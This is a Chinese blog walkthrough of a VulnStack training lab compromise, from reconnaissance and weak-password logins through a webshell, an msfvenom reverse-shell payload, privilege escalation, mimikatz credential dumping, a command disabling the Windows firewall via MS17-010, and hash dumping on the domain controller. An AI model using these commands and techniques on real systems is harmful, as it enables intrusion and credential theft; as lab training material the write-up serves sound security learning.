VulnStack靶场渗透测试

最新推荐文章于 2024-05-03 14:06:03 发布
最新推荐文章于 2024-05-03 14:06:03 发布
阅读量353 收藏 1
点赞数
文章标签: 渗透测试 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/X_sweelg/article/details/118571668
版权

环境准备

环境拓扑图

 总共三台机器,除了win7是两张网卡,桥接和VMnet3,其他两台内网机器都是VMnet3

 kali和win7的桥接网卡模拟公网环境

一、信息收集

主机发现

netdiscover -i eth0 -r 192.168.1.0/24

目标IP:192.168.1.136

端口扫描

sudo masscan -p 1-65535 192.168.1.136 --rate=1000

目录扫描

gobuster -m dir -fw -u 192.168.1.136 -w /usr/share/wordlists/dirb/big.txt -t 50

看到有个phpMyAdmin

访问有弱口令root root

可以看到是yxcms的数据库

尝试访问http://192.168.1.136/yxcms/

公告信息有后台地址和密码

http://192.168.1.136/yxcms//index.php?r=admin

账户admin 密码123456

随后查看了robots.txt,有目录路径泄露

二、后台getshell

再管理首页-前台模板出插入一句话,再结合之前的路径泄露,getshell

蚁剑连接成功

三、内网信息收集

有两张网卡,192.168.52.143和192.168.1.136

也没有任何安全狗之类的安全设备,所以也不用做免杀

四、metasploit提权和内网信息收集

直接做个木马上传msf监听上线

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.162 lport=12345 -f exe >shell.exe

迁移进程到x64里面

直接尝试用攻击向量提权getsystem

通过mimikatz抓取到了本地管理员Administrator明文密码 hongrisec@20199

五、域内信息收集

msf容易掉线,所以cs上线后提权操作

域是GOD

域内所有计算机

域控机器名为OWA,另一台则叫ROOT-TVI862UBEH

获取域内登录过的用户信息

也可以用post模块后渗透直接定位域控

通过域内信息收集得到

两个IP段:192.168.1.136        192.168.52.143

域名:god.org

域管:owa

域管IP:192.168.52.138

六、添加代理渗透域控

添加路由

开启代理 use server/socks_proxy

proxychains设置代理nmap扫描内网 sudo vi /etc/proxychains4.conf 

扫描常用端口

开着445端口,扫描域控是否存在永恒之蓝ms17_010,确认后可以直接使用msf开打

打了几次也换了exp和payload都没有成功,原来没有关闭防火墙

所以使用ms17_010的远程命令执行关闭防火墙

set command netsh advfirewall set allprofiles state off

关闭防火墙之后用正向连接shell

windows/x64/meterpreter/bind_tcp

至此就打了域控的system权限

最后用mimikatz抓取密码

导出hash

run post/windows/gather/hashdump

Sweelg
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
VulnStack靶场6
weixin_45568454的博客
11-04 209
打靶日记之VulnStack记录 记下了好多踩过的坑 以及一些小的心得体会
VulnStack实战(一)超级实战
weixin_51198941的博客
07-14 783
查看了一下,把敏感信息收集起来,比如网站根目录,开启的什么敏感文件,然后我们往下边翻的时候,发现有一个登录框,用常见的弱口令试了一下,发现root,root能登录。当前名为god,登录用户是administrator,且存在两个网卡,分别是192.168.22.133(外网)和192.168.52.143(内网)net config Workstation 当前计算机名,全名,用户名,系统版本,工作站,登陆。共有三台机器,Win7是对外的web机,Win2003和Win2008(DC)是内网机器。
2024年网安最全Vulnstack红日安全内网渗透靶场1实战_vulnstack靶场
最新发布
2401_84252281的博客
05-03 844
是由红日安全团队倾力打造一个靶场知识平台,靶场环境(CMS、漏洞管理、以及管理等)全部依据国内企业的业务习惯进行模拟,环境设计思路全部来源 ATT&CK 红队评估设计模式,从环境搭建、漏洞利用、内网搜集、横向移动、构建通道、持久控制、痕迹清理等方式进行搭建靶场和设计题目。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网环境靶场渗透过程。
Vulnstack----1、ATT&CK红队评估实战靶场
七天
08-01 1133
3、敏感目录:http://192.168.144.132/phpMyadmin。4、发现yxcms:http://192.168.144.132/yxcms。192.168.52.143:存在MS17-010。192.168.52.138:存在MS17-010。用户:dev1、root-tvi862ubeh。win7内网ip:192.168.52.143。1、ip地址:192.168.144.132。内网ip地址:192.168.52.143。内网网段:192.168.52.0/24。
内网渗透Vulnstack4靶场的全方位打法
xf555er的博客
12-29 1438
MS14-068是一个著名的Windows Kerberos安全漏洞,允许攻击者篡改Kerberos票据,从而获取非法提权。这个漏洞特别影响Windows控制器,能让攻击者伪造Kerberos票据,获取内几乎任意账户的权限,包括管理员权限。这使得攻击者可以在网络中随意访问和控制资源。
vulnstack内网靶场渗透测试
three_1996的博客
03-19 648
【代码】vulnstack内网靶场渗透测试
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
vulhub漏洞测试靶场
08-16
vulhub-master.zip
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
billu-b0x靶场渗透
11-14
billu-b0x靶场渗透
渗透测试靶场,模拟搭建渗透测试真实环境,搭建靶场详细流程即相关包.zip
12-05
内容:详细的渗透测试靶场搭建包,以及详细搭建流程,提供了靶场所有环境,比如sql注入,木马,获权等模拟真实环境 适用于:需要学习渗透测试相关知识,但是没有搭建好模拟真实环境的靶场人群下载以及使用,同时针对...
渗透测试Vulnstack1内网渗透
LvHLong的博客
04-27 3293
使用dirsearch扫描目录 python dirsearch.py -u http://192.168.234.177/ -i 200,301 发现备份文件 beifen.rar 和 phpmyadmin 使用 Nmap 扫描
VulnStack环境靶场渗透(一)
qq_43590351的博客
09-20 1332
红日靶场一 msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.31.229 LPORT=4444 -f exe -o msf1.exe 实验环境 web服务器 192.168.31.79192.168.52.143 成员server2003 192.168.52.141 控server2008 192.168.52.138 物理机 192.168.31.238 kali-vps 192.168.31.229
vuln靶场——DC-1
qq_54480761的博客
05-03 1099
我们切换语句进入shell,执行whoami查看当前的权限,执行ls查看当前目录下的文件,切换到root目录。典型的drupal,启动Metersploit,MSF存在drupal模块,尝试使用msf渗透。查看www目录下文件,发现flag1.txt文件,打开发现提示信息,内容提示寻找站点的配置文件。搜索Drupal 7的漏洞发现可利用的漏洞很多,搜索与Drupal 7相关的漏洞利用模块。登陆战点之后,随便点几个选项,例如左上角的Content,发现flag3。进行登录,密码是之前我们自己替换的。
带你玩转渗透测试靶场Vulnhub——hacksudo3
m0_74025111的博客
04-24 431
从目录里面发现/hidden/ 我们先去访问一下http://192.168.1.108/hidden,由此发现好像是一个解密的。我们先来访问默认的登录页面:http://192.168.1.108/login.php 竟然发现了这个网页的登录页面。继续访问下一个,http://192.168.1.108/decrypt/ 发现这个也是一个解密的网站。访问:http://192.168.1.108/bruteforce/这也是一个解密用的网站。以上的命令都可以执行的话,证明是存在命令注入漏洞的。
Vulnstack1学习
ruyueattention
10-26 1112
文章目录前言一、环境搭建二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、环境搭建 一共三台机器,其中w7属于外网入口,w2003与windows server2008属于内网主机。因此为了实现环境需要为w7设置两张网卡,一张内网,一张外网。 w7 w2003 windows server
常用渗透测试靶场
山己见的博客
11-25 5240
1 DVWA 推荐新手首选靶场,配置简单,需下载phpstudy和靶场文件包,简单部署之后即可访问。 包含了常见的web漏洞(php的),每个漏洞分为四个等级,每个等级都有源码查看,最高等级的源码是最安全的。 DVWA靶场源码下载:http://www.dvwa.co.uk/index.php phpstudy官方下载:https://m.xp.cn/ 2 网络安全实验室 做题的靶场,也是一个基础靶场,是一个在线的靶场。 地址:http://hackinglab.cn/ 3 sqli-labs sqli-l
渗透靶场——vulntarget-d综合靶场
tlovejr的博客
04-01 2764
部署环境 此次靶场共两个个镜像文件,接下来先给大家说一下整个环境的拓扑图以环境布置。 信息收集 扫描主机 扫描同一网段中的存活主机 发现存活主机ip地址(其他ip是我其他机器的ip地址) 192.168.1.17 扫描端口 扫描一下存活靶机的ip地址 nmap -A -p- 192.168.1.17 发现开放了80、81、3306、8888,看这架势应该是宝塔的界面,那就先访问端口看看 访问80端口发现不可 web渗透 访问81端口 在这里发现了一个骑士的cms框架界面 看到底下的版本信息,搜索
【网络安全学习】渗透测试篇01-DVWA靶场环境搭建教程
JackFCH的博客
10-08 5341
网上不乏有许多类似的教程,但经过笔者检验后发现,多数的文章内容相近且不详细。使笔者在进行环境搭建的过程中着实走了不少弯路。就连DVWA的下载链接也早已不可用,因此为帮助学习者节省时间,笔者重新归纳了整套流程并将其发布于此。一、介绍及注意事项DVWA(Damn Vulnerable Web Application)是一款PHP/MySQL的网络应用程序,其设计目的主要是为了帮助安全专家们在合法的环境下测试他们的技能和工具,或是帮助学生和开发者们更好地理解和学习网络应用程序的安全知识,比如Web渗透
web渗透测试靶场cms
09-06
你可以尝试一些知名的Web渗透测试靶场CMS,如DVWA(Damn Vulnerable Web Application)、OWASP Juice Shop和WebGoat。这些靶场CMS都是为了帮助安全专业人员和开发者学习和实践Web渗透测试技术而设计的,它们提供了...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sweelg

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值